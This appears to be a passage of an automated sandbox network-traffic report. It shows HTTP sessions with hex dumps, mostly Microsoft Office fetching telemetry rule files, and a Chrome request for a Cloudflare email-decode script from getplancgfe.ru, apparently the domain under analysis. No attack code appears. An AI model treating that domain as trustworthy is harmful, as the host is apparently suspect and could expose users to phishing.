                                                                                        2024-11-01 12:46:56 UTC1369INData Raw: 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 6f 70 61 63 69 74 79 2c 2e 34 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 31 29 7d 35 30 25 7b 6f 70 61 63 69 74 79 3a 31 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 73 63 61 6c 65 2c 31 2e 31 32 35 29 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 62 65 61 74 2d 66 61 64 65 7b 30 25 2c 74 6f 7b 6f 70 61 63 69 74 79 3a 76 61 72 28 2d 2d 66 61 2d 62 65 61 74 2d 66 61 64 65 2d 6f 70 61
                                                                                        Data Ascii: (--fa-beat-fade-opacity,.4);-webkit-transform:scale(1);transform:scale(1)}50%{opacity:1;-webkit-transform:scale(var(--fa-beat-fade-scale,1.125));transform:scale(var(--fa-beat-fade-scale,1.125))}}@keyframes fa-beat-fade{0%,to{opacity:var(--fa-beat-fade-opa
                                                                                        2024-11-01 12:46:56 UTC1369INData Raw: 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 32 64 65 67 29 7d 33 36 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 32 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 32 64 65 67 29 7d 34 30 25 2c 74 6f 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 73 68 61 6b 65 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 7d 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67
                                                                                        Data Ascii: orm:rotate(-12deg)}36%{-webkit-transform:rotate(12deg);transform:rotate(12deg)}40%,to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes fa-shake{0%{-webkit-transform:rotate(-15deg);transform:rotate(-15deg)}4%{-webkit-transform:rotate(15deg


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        102192.168.2.44986713.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:56 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:56 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:56 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 472
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                        ETag: "0x8DC582B91EAD002"
                                                                                        x-ms-request-id: fd45401a-201e-005d-6808-2cafb3000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124656Z-16ccfc49897wlhjjhC1DFWsx6c00000000h0000000009my3
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:56 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        103192.168.2.44986413.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:56 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:56 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:56 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 469
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                        ETag: "0x8DC582BB3CAEBB8"
                                                                                        x-ms-request-id: 3c311aa7-c01e-008e-22a5-2a7381000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124656Z-159b85dff8fqn89xhC1DFWe83c000000018000000000bksq
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:56 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        104192.168.2.44986613.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:56 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:56 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:56 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 416
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                        ETag: "0x8DC582BB5284CCE"
                                                                                        x-ms-request-id: 4e409c6c-b01e-003d-22c3-2bd32c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124656Z-16dc884887bbfwjkhC1DFWyza800000000m0000000007yqw
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:56 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        105192.168.2.44986813.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:56 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:56 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:56 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 432
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                        ETag: "0x8DC582BAABA2A10"
                                                                                        x-ms-request-id: 7134e14c-501e-0078-0508-2c06cf000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124656Z-16ccfc49897cvhbphC1DFWt5d800000000n000000000k9p2
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:56 UTC432INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        106192.168.2.44986913.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:56 UTC192OUTGET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:56 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:56 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 475
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                        ETag: "0x8DC582BBA740822"
                                                                                        x-ms-request-id: 1d289f04-201e-0003-7b2a-2cf85a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124656Z-176bd8f9bc56w2rshC1DFWd88n00000000zg00000000685q
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        X-Cache-Info: L1_T2
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:56 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        107192.168.2.449870104.21.8.814435772C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:57 UTC400OUTGET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1
                                                                                        Host: getplancgfe.ru
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-11-01 12:46:57 UTC752INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:57 GMT
                                                                                        Content-Type: application/javascript
                                                                                        Content-Length: 1239
                                                                                        Connection: close
                                                                                        Last-Modified: Fri, 25 Oct 2024 16:48:41 GMT
                                                                                        ETag: "671bcbe9-4d7"
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EfR5FuIePxRhQmdHynZldOQfzL4J43wRjpgodSPA%2B7Yt54g8aSI4KqHUN7qcwD%2BDba1ZNSv00bH61yq%2FDsMEGjjw7EWaYKbeQ87pDIUDt0fmr5mD6hcPcL2q4DuNdssvjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8dbbfd977f5a479c-DFW
                                                                                        X-Frame-Options: DENY
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Expires: Sun, 03 Nov 2024 12:46:57 GMT
                                                                                        Cache-Control: max-age=172800
                                                                                        Cache-Control: public
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:57 UTC617INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 65 28 65 29 7b 74 72 79 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 63 6f 6e 73 6f 6c 65 29 72 65 74 75 72 6e 3b 22 65 72 72 6f 72 22 69 6e 20 63 6f 6e 73 6f 6c 65 3f 63 6f 6e 73 6f 6c 65 2e 65 72 72 6f 72 28 65 29 3a 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 72 65 74 75 72 6e 20 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 27 3c 61 20 68 72 65 66 3d 22 27 2b 65 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2b 27 22 3e 3c 2f 61 3e 27 2c 64 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 30 5d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 68 72 65 66
                                                                                        Data Ascii: !function(){"use strict";function e(e){try{if("undefined"==typeof console)return;"error"in console?console.error(e):console.log(e)}catch(e){}}function t(e){return d.innerHTML='<a href="'+e.replace(/"/g,"&quot;")+'"></a>',d.childNodes[0].getAttribute("href
                                                                                        2024-11-01 12:46:57 UTC622INData Raw: 66 2c 61 2b 6c 2e 6c 65 6e 67 74 68 29 29 7d 63 61 74 63 68 28 69 29 7b 65 28 69 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 75 29 2c 63 3d 30 3b 63 3c 72 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 74 72 79 7b 76 61 72 20 6f 3d 72 5b 63 5d 2c 61 3d 6f 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 69 3d 6f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 66 29 3b 69 66 28 69 29 7b 76 61 72 20 6c 3d 6e 28 69 2c 30 29 2c 64 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 54 65 78 74 4e 6f 64 65 28 6c 29 3b 61 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 64 2c 6f 29 7d 7d 63 61 74 63 68 28 68 29 7b 65 28 68 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 61 28 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e
                                                                                        Data Ascii: f,a+l.length))}catch(i){e(i)}}function o(t){for(var r=t.querySelectorAll(u),c=0;c<r.length;c++)try{var o=r[c],a=o.parentNode,i=o.getAttribute(f);if(i){var l=n(i,0),d=document.createTextNode(l);a.replaceChild(d,o)}}catch(h){e(h)}}function a(t){for(var r=t.


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        108192.168.2.44987513.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:57 UTC192OUTGET /rules/rule120677v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:57 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:57 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 405
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:37 GMT
                                                                                        ETag: "0x8DC582B942B6AFF"
                                                                                        x-ms-request-id: c6a001d5-701e-0050-1608-2c6767000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124657Z-16ccfc49897kh956hC1DFW2afc00000000kg00000000qh9w
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:57 UTC405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5e 5b 58 78 5d 5b 45 65 5d 5b 4e 6e 5d 24 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120677" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <SR T="2" R="(^[Xx][Ee][Nn]$)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        109192.168.2.44987413.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:57 UTC192OUTGET /rules/rule120676v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:57 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:57 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 472
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                        ETag: "0x8DC582B984BF177"
                                                                                        x-ms-request-id: 35c285af-301e-0051-5b08-2c38bb000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124657Z-16ccfc498979nn5nhC1DFWk16800000000rg000000008pse
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-01 12:46:57 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        110192.168.2.44987113.107.246.45443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-01 12:46:57 UTC192OUTGET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-01 12:46:57 UTC491INHTTP/1.1 200 OK
                                                                                        Date: Fri, 01 Nov 2024 12:46:57 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 427
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                        ETag: "0x8DC582BB464F255"
                                                                                        x-ms-request-id: 44d502e9-701e-000d-5c08-2c6de3000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241101T124657Z-16ccfc498979lfwnhC1DFW56w800000000sg000000005v3x
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L1_T2
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
